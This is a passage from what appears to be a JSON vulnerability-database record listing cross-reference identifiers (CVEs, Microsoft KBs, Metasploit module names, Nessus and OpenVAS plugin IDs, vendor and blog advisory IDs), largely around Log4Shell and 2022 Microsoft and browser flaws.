"MALWAREBYTES:7D6B4BABB8063861BF6305FDC03DBE1C", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:8FF6ADCDE71AD78C1537280203BB4A22", "MALWAREBYTES:90BD6A9BB937B6617FDC4FE73A86B38A", "MALWAREBYTES:96F58422910DF7040786EDB21736E547", "MALWAREBYTES:9E683A8CBB0F4ADB76A7183C47833E13", "MALWAREBYTES:A165959E3A462AF8315F01F1020BBF53", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:A92CA3CF06DBCD086A388A462B770E3B", "MALWAREBYTES:B24AD5C8381AD8F711BC02246606B36A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:C0A087A65BF94128AA1574F7D45E306B", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:DDF3883C3A8B9A70629872FE83522C17", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:F40C2861F5D3CFF011E96C0D46C51A46", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-LINUX-HTTP-MOBILEIRON_CORE_LOG4SHELL-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_WORD_HTA-", 
"MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSDTJS_RCE-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:1E3441B57C08BC18202B9FE758C2CA71", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:567C6CC66BD942B4F1BBE84ED9F6665B", "MMPC:795E0A765679492C51FEFA2B19EAD597", "MMPC:85647D37E79AFEF2BFF74B4682648C5E", "MMPC:BB2F5840056D55375C4A19D2FF07C695", "MMPC:C857BFAD4920FD5B25BF42D5469945F6", "MMPC:F36351D1B5A5C40989F46EF8729039A7"]}, {"type": "mozilla", "idList": ["MFSA2022-33", "MFSA2022-34", "MFSA2022-35", "MFSA2022-36", "MFSA2022-37"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0199", "MS:CVE-2017-11882", "MS:CVE-2018-0802", "MS:CVE-2021-40444", "MS:CVE-2021-44228", "MS:CVE-2022-22022", "MS:CVE-2022-22026", "MS:CVE-2022-22028", "MS:CVE-2022-22029", "MS:CVE-2022-22034", "MS:CVE-2022-22038", "MS:CVE-2022-22039", "MS:CVE-2022-22041", "MS:CVE-2022-22047", "MS:CVE-2022-22049", "MS:CVE-2022-2294", "MS:CVE-2022-2295", "MS:CVE-2022-2624", "MS:CVE-2022-30190", "MS:CVE-2022-30206", "MS:CVE-2022-30220", "MS:CVE-2022-30226", "MS:CVE-2022-3075", "MS:CVE-2022-33636", "MS:CVE-2022-33649", "MS:CVE-2022-34713", "MS:CVE-2022-34715", "MS:CVE-2022-34718", "MS:CVE-2022-34724", "MS:CVE-2022-35743", "MS:CVE-2022-35750", "MS:CVE-2022-35796", "MS:CVE-2022-35803", "MS:CVE-2022-37969", "MS:CVE-2022-38012", "MS:CVE-2022-41040", "MS:CVE-2022-41082"]}, {"type": "mskb", "idList": ["KB2553204", "KB3141529", "KB3141538", "KB3162047", "KB3178703", "KB3178710", "KB4011262", "KB4011276", "KB4011574", "KB4011580", "KB4011604", "KB4011607", "KB4011610", "KB4011618", "KB4011643", "KB4011656", "KB4011659", "KB4014793", "KB5005563", "KB5015863", "KB5015874", "KB5015875", "KB5015877", "KB5017305", "KB5017308", "KB5017316", "KB5017327", "KB5017328", "KB5017358", "KB5017371", "KB5017392", "KB5019758"]}, {"type": "msrc", "idList": ["MSRC:4C56F4539ADD1B17DFD44549ADFEE2FF", "MSRC:4F7507AA26F4DEB78152DE764136012C", 
"MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:567C6CC66BD942B4F1BBE84ED9F6665B", "MSSECURE:795E0A765679492C51FEFA2B19EAD597", "MSSECURE:7D81C7477636B6DB964C5D3E62D605D5", "MSSECURE:85647D37E79AFEF2BFF74B4682648C5E", "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695", "MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:C857BFAD4920FD5B25BF42D5469945F6", "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E", "MSSECURE:F36351D1B5A5C40989F46EF8729039A7"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785187", "MYHACK58:62201785189", "MYHACK58:62201785243", "MYHACK58:62201785268", "MYHACK58:62201785272", "MYHACK58:62201785331", "MYHACK58:62201786816", "MYHACK58:62201786827", "MYHACK58:62201788439", "MYHACK58:62201788542", "MYHACK58:62201789251", "MYHACK58:62201789425", "MYHACK58:62201891024", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["701415.PASL", "701420.PASL", "AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2021-1733.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALAS-2022-1855.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "ALMA_LINUX_ALSA-2022-6164.NASL", "ALMA_LINUX_ALSA-2022-6165.NASL", "ALMA_LINUX_ALSA-2022-6174.NASL", "ALMA_LINUX_ALSA-2022-6175.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_2_16_0_MAC.NASL", "APACHE_LOG4J_2_17_0.NASL", 
"APACHE_LOG4J_2_17_0_MAC.NASL", "APACHE_LOG4J_2_17_1.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_CVE-2021-45056_DIRECT_CHECK.NBIN", "APACHE_LOG4SHELL_DNS.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_MSRPC.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SNMP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_LOG4SHELL_UPNP.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "APPLE_IOS_156_CHECK.NBIN", "CENTOS_RHSA-2022-6169.NASL", "CENTOS_RHSA-2022-6179.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2852.NASL", "DEBIAN_DLA-2870.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DLA-3080.NASL", "DEBIAN_DLA-3097.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "DEBIAN_DSA-5024.NASL", "DEBIAN_DSA-5180.NASL", "DEBIAN_DSA-5201.NASL", "DEBIAN_DSA-5217.NASL", "DEBIAN_DSA-5221.NASL", "DEBIAN_DSA-5225.NASL", "EULEROS_SA-2022-1276.NASL", "EXCHANGE_CVE-2022-41040_IOC.NBIN", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_744EC9D7FE0F11ECBCD23065EC8FD3EC.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_96A41723133A11EDBE3B3065EC8FD3EC.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "FREEBSD_PKG_D1BE3D73673711EC9EEA589CFC007716.NASL", "FREEBSD_PKG_F38D25AC2B7A11EDA1EF3065EC8FD3EC.NASL", "GENTOO_GLSA-202208-35.NASL", "GENTOO_GLSA-202208-37.NASL", 
"GENTOO_GLSA-202208-38.NASL", "GENTOO_GLSA-202208-39.NASL", "GENTOO_GLSA-202209-02.NASL", "GENTOO_GLSA-202209-23.NASL", "GOOGLE_CHROME_103_0_5060_114.NASL", "GOOGLE_CHROME_104_0_5112_79.NASL", "GOOGLE_CHROME_105_0_5195_102.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_NTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOSX_GOOGLE_CHROME_103_0_5060_114.NASL", "MACOSX_GOOGLE_CHROME_104_0_5112_79.NASL", "MACOSX_GOOGLE_CHROME_105_0_5195_102.NASL", "MACOS_FIREFOX_102_2_ESR.NASL", "MACOS_FIREFOX_104_0.NASL", "MACOS_FIREFOX_91_13_ESR.NASL", "MACOS_HT213345.NASL", "MACOS_SPLUNK_824.NASL", "MACOS_THUNDERBIRD_102_2.NASL", "MACOS_THUNDERBIRD_91_13.NASL", "MICROSOFT_EDGE_CHROMIUM_103_0_1264_49.NASL", "MICROSOFT_EDGE_CHROMIUM_104_0_1293_47.NASL", "MICROSOFT_EDGE_CHROMIUM_105_0_1343_25.NASL", "MICROSOFT_EDGE_CHROMIUM_105_0_1343_27.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "MOZILLA_FIREFOX_102_2_ESR.NASL", "MOZILLA_FIREFOX_104_0.NASL", "MOZILLA_FIREFOX_91_13_ESR.NASL", "MOZILLA_THUNDERBIRD_102_2.NASL", "MOZILLA_THUNDERBIRD_91_13.NASL", "MS17-010.NASL", "MSDT_RCE_CVE_2022-30190_REG_CHECK.NASL", "MYSQL_ENTERPRISE_MONITOR_8_0_30.NASL", "NUTANIX_NXSA-AOS-5_20_3_5.NASL", "NUTANIX_NXSA-AOS-5_20_4.NASL", "NUTANIX_NXSA-AOS-6_0_2_5.NASL", "NUTANIX_NXSA-AOS-6_0_2_6.NASL", "NUTANIX_NXSA-AOS-6_1.NASL", "NUTANIX_NXSA-AOS-6_1_1.NASL", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1605.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2021-4118.NASL", "OPENSUSE-2021-4208.NASL", "OPENSUSE-2022-0002-1.NASL", "OPENSUSE-2022-0038-1.NASL", "OPENSUSE-2022-10055-1.NASL", 
"OPENSUSE-2022-10057-1.NASL", "OPENSUSE-2022-10086-1.NASL", "OPENSUSE-2022-10087-1.NASL", "OPENSUSE-2022-10088-1.NASL", "OPENSUSE-2022-10117-1.NASL", "OPENSUSE-2022-10118-1.NASL", "OPENSUSE-2022-10119-1.NASL", "OPENSUSE-2022-10120-1.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-6164.NASL", "ORACLELINUX_ELSA-2022-6165.NASL", "ORACLELINUX_ELSA-2022-6169.NASL", "ORACLELINUX_ELSA-2022-6174.NASL", "ORACLELINUX_ELSA-2022-6175.NASL", "ORACLELINUX_ELSA-2022-6179.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_ENTERPRISE_MANAGER_CPU_APR_2022.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_CPU_APR_2022.NASL", "ORACLE_IDENTITY_MANAGEMENT_CPU_APR_2022.NASL", "ORACLE_JDEVELOPER_CPU_APR_2022.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JAN_2022.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_APR_2022.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_JAN_2022.NASL", "ORACLE_WEBCENTER_SITES_CPU_APR_2022.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "REDHAT-RHSA-2022-1462.NASL", "REDHAT-RHSA-2022-1463.NASL", "REDHAT-RHSA-2022-6164.NASL", "REDHAT-RHSA-2022-6165.NASL", "REDHAT-RHSA-2022-6166.NASL", "REDHAT-RHSA-2022-6167.NASL", "REDHAT-RHSA-2022-6168.NASL", "REDHAT-RHSA-2022-6169.NASL", "REDHAT-RHSA-2022-6174.NASL", "REDHAT-RHSA-2022-6175.NASL", "REDHAT-RHSA-2022-6176.NASL", "REDHAT-RHSA-2022-6177.NASL", "REDHAT-RHSA-2022-6178.NASL", "REDHAT-RHSA-2022-6179.NASL", "SLACKWARE_SSA_2022-235-02.NASL", "SLACKWARE_SSA_2022-235-03.NASL", "SLACKWARE_SSA_2022-249-01.NASL", "SL_20220825_FIREFOX_ON_SL7_X.NASL", "SL_20220825_THUNDERBIRD_ON_SL7_X.NASL", "SMB_NT_MS17-010.NASL", "SMB_NT_MS17-APR_4015551.NASL", "SMB_NT_MS17_APR_4014793.NASL", "SMB_NT_MS17_APR_4015549.NASL", "SMB_NT_MS17_APR_OFFICE.NASL", "SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE.NASL", 
"SMB_NT_MS18_JAN_OFFICE_COMPATIBILITY.NASL", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "SMB_NT_MS22_AUG_5016616.NASL", "SMB_NT_MS22_AUG_5016622.NASL", "SMB_NT_MS22_AUG_5016623.NASL", "SMB_NT_MS22_AUG_5016627.NASL", "SMB_NT_MS22_AUG_5016629.NASL", "SMB_NT_MS22_AUG_5016639.NASL", "SMB_NT_MS22_AUG_5016679.NASL", "SMB_NT_MS22_AUG_5016683.NASL", "SMB_NT_MS22_AUG_5016684.NASL", "SMB_NT_MS22_AUG_5016686.NASL", "SMB_NT_MS22_JUL_5015807.NASL", "SMB_NT_MS22_JUL_5015808.NASL", "SMB_NT_MS22_JUL_5015811.NASL", "SMB_NT_MS22_JUL_5015814.NASL", "SMB_NT_MS22_JUL_5015827.NASL", "SMB_NT_MS22_JUL_5015832.NASL", "SMB_NT_MS22_JUL_5015862.NASL", "SMB_NT_MS22_JUL_5015870.NASL", "SMB_NT_MS22_JUL_5015875.NASL", "SMB_NT_MS22_JUL_5015877.NASL", "SMB_NT_MS22_JUN_5014678.NASL", "SMB_NT_MS22_JUN_5014692.NASL", "SMB_NT_MS22_JUN_5014697.NASL", "SMB_NT_MS22_JUN_5014699.NASL", "SMB_NT_MS22_JUN_5014702.NASL", "SMB_NT_MS22_JUN_5014710.NASL", "SMB_NT_MS22_JUN_5014741.NASL", "SMB_NT_MS22_JUN_5014742.NASL", "SMB_NT_MS22_JUN_5014743.NASL", "SMB_NT_MS22_JUN_5014746.NASL", "SMB_NT_MS22_NOV_EXCHANGE.NASL", "SMB_NT_MS22_OCT_EXCHANGE_ZERODAY.NASL", "SMB_NT_MS22_SEP_5017305.NASL", "SMB_NT_MS22_SEP_5017308.NASL", "SMB_NT_MS22_SEP_5017315.NASL", "SMB_NT_MS22_SEP_5017327.NASL", "SMB_NT_MS22_SEP_5017328.NASL", "SMB_NT_MS22_SEP_5017365.NASL", "SMB_NT_MS22_SEP_5017371.NASL", "SMB_NT_MS22_SEP_5017373.NASL", "SMB_NT_MS22_SEP_5017377.NASL", "SMB_NT_MS22_SEP_5017392.NASL", "SPLUNK_824.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "SUSE_SU-2022-2984-1.NASL", "SUSE_SU-2022-3007-1.NASL", "SUSE_SU-2022-3030-1.NASL", "SUSE_SU-2022-3272-1.NASL", "SUSE_SU-2022-3273-1.NASL", "SUSE_SU-2022-3281-1.NASL", "SUSE_SU-2022-3396-1.NASL", 
"UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5203-1.NASL", "UBUNTU_USN-5223-1.NASL", "UBUNTU_USN-5568-1.NASL", "UBUNTU_USN-5581-1.NASL", "UBUNTU_USN-5663-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "nvidia", "idList": ["NVIDIA:5294", "NVIDIA:5295"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810686", "OPENVAS:1361412562310810687", "OPENVAS:1361412562310810688", "OPENVAS:1361412562310810689", "OPENVAS:1361412562310810690", "OPENVAS:1361412562310810692", "OPENVAS:1361412562310810850", "OPENVAS:1361412562310810851", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708", "OPENVAS:1361412562310812730", "OPENVAS:1361412562310812731"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2022", "ORACLE:CPUJAN2022", "ORACLE:CPUJUL2022", "ORACLE:CPUOCT2022"]}, {"type": "oraclelinux", "idList": ["ELSA-2022-6164", "ELSA-2022-6165", "ELSA-2022-6169", "ELSA-2022-6174", "ELSA-2022-6175", "ELSA-2022-6179"]}, {"type": "osv", "idList": ["OSV:DLA-2842-1", "OSV:DLA-2852-1", "OSV:DLA-2870-1", "OSV:DLA-3080-1", "OSV:DLA-3097-1", "OSV:DSA-5020-1", "OSV:DSA-5022-1", "OSV:DSA-5024-1", "OSV:DSA-5180-1", "OSV:DSA-5201-1", "OSV:DSA-5217-1", "OSV:DSA-5221-1", "OSV:DSA-5225-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-8489-44MV-GGJ8", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-P6XC-XR62-6R2G", "OSV:GHSA-V57X-GXFJ-484Q"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142211", "PACKETSTORM:142281", 
"PACKETSTORM:143164", "PACKETSTORM:145226", "PACKETSTORM:165214", "PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:167317", "PACKETSTORM:167438", "PACKETSTORM:167917", "PACKETSTORM:168068", "PACKETSTORM:168069"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:0EAB7251347951045CAC549194E33673", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:55DEB69D0C94AA59433F0E33F7B45AEC", "QUALYSBLOG:5A5DF56C2B4E5DB4176574A83F54FECB", "QUALYSBLOG:65C282BB0F312A3AD8A043024FD3D866", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:69FF0F583C65CD2D1EB59914BE41A705", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:89B0E9C4C12FFA944639C5B7B34594DB", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9404839CD3C8BAC4F52CB2E5E91BC85E", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9E3CACCA2916D132C2D630A8C15119F3", "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "QUALYSBLOG:A63B251EBA1A69DBCD57674990704F6C", "QUALYSBLOG:AC756D2C7DB65BB8BC9FBD558B7F3AD3", "QUALYSBLOG:AE4AA7402829D66599C8A25E83DD0FD2", "QUALYSBLOG:BB3D6B2DDD8D4FA41B52503EF011FDA4", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", 
"QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:DE2E40D3BB574E53C7448F3A304849C9", "QUALYSBLOG:F062F85432853297A014064EA7A5C183", "QUALYSBLOG:FFC962F3C57B514805A24EA07FF565A1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:207700353EDB2453B1928E90A6683A0E", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:36C78C12B88BFE8FEF93D8EF7A7AA553", "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:509F3BE1FB927288AB4D3BD9A3090852", "RAPID7BLOG:5DB8D1BDA8397518E9A820552610B197", "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:882168BD332366CE296FB09DC00E018E", "RAPID7BLOG:90A5B4252807D9A3550CB8449AA62109", "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:9F3C0081D4135E83F44053063F0E78EE", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:ADAE3CACA7F41A02C12F44F4616369FF", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "RAPID7BLOG:AF9E6199C63A57B22FAE6AAEDD650D39", "RAPID7BLOG:B37CF2E44EB6AA38B417BB09297CD3E1", "RAPID7BLOG:B54637535A9D368B19D4D9881C6C34B3", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "RAPID7BLOG:C6C1B8357ABD28AEB0F423A0A099098A", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046", 
"RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:BDA3EA90B57FC8895B98DAADBAE3D7DE", "RAPID7COMMUNITY:DADF9A5B22CCB70155177EBC2E86131E"]}, {"type": "redhat", "idList": ["RHSA-2021:5093", "RHSA-2021:5094", "RHSA-2021:5106", "RHSA-2021:5107", "RHSA-2021:5108", "RHSA-2021:5126", "RHSA-2021:5127", "RHSA-2021:5128", "RHSA-2021:5129", "RHSA-2021:5130", "RHSA-2021:5132", "RHSA-2021:5133", "RHSA-2021:5134", "RHSA-2021:5137", "RHSA-2021:5138", "RHSA-2021:5140", "RHSA-2021:5141", "RHSA-2021:5148", "RHSA-2021:5183", "RHSA-2021:5184", "RHSA-2021:5186", "RHSA-2022:0026", "RHSA-2022:0042", "RHSA-2022:0043", "RHSA-2022:0044", "RHSA-2022:0047", "RHSA-2022:0082", "RHSA-2022:0083", "RHSA-2022:0138", "RHSA-2022:0181", "RHSA-2022:0203", "RHSA-2022:0205", "RHSA-2022:0216", "RHSA-2022:0219", "RHSA-2022:0222", "RHSA-2022:0223", "RHSA-2022:0225", "RHSA-2022:0226", "RHSA-2022:0227", "RHSA-2022:0230", "RHSA-2022:0236", "RHSA-2022:0296", "RHSA-2022:0431", "RHSA-2022:0467", "RHSA-2022:0485", "RHSA-2022:0493", "RHSA-2022:1296", "RHSA-2022:1297", "RHSA-2022:1299", "RHSA-2022:1462", "RHSA-2022:1463", "RHSA-2022:1469", "RHSA-2022:6164", "RHSA-2022:6165", "RHSA-2022:6166", "RHSA-2022:6167", "RHSA-2022:6168", "RHSA-2022:6169", 